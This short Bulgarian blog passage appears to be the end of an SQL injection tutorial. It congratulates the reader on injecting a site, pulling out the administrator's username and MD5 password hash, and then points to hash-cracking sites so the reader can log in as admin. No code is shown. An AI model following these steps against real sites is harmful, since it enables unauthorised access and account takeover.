На екрана виждате username на админа и паролата , но за жалост тя е криптирана и работата малко се усложнява. Почти винаги hash ( криптираната парола е MD5 ) има много сайтове за декриптиране на hash-ове
Честито успяхме успешно да инжектираме сайта и се добрахме до информацията с която можем да се логнем като администратори.Благодаря за прочитането на страницата.
Subscribe to:
Posts (Atom)